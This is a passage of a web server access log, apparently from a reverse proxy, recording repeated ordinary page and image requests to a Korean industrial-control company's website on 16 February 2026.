(KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:40:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:40:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18691] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:40:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:40:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:40:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:51:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:19:51:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:51:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:51:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:51:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:51:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:51:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:51:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:51:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:51:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:19:51:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:04:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:04:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18973] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:13:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:13:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:13:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:13:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:13:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:13:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:13:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:13:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:13:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:13:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:13:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:14:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:14:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:14:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:14:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:14:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:14:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:14:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:14:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:14:51 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:14:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:14:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:20:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:20:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:20:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:20:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:20:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:20:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:20:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:20:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:20:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:20:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:20:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:22:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:22:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:22:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:22:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:22:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:22:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:22:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:22:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:22:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:22:41 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:22:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:24:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[16/Feb/2026:20:24:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:24:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:24:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:24:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:24:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:24:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:24:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 18928] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:24:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:24:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:24:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:30:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 9986] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" -[16/Feb/2026:20:30:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:30:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://www.hanmocnn.co.kr/" -[16/Feb/2026:20:30:02 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 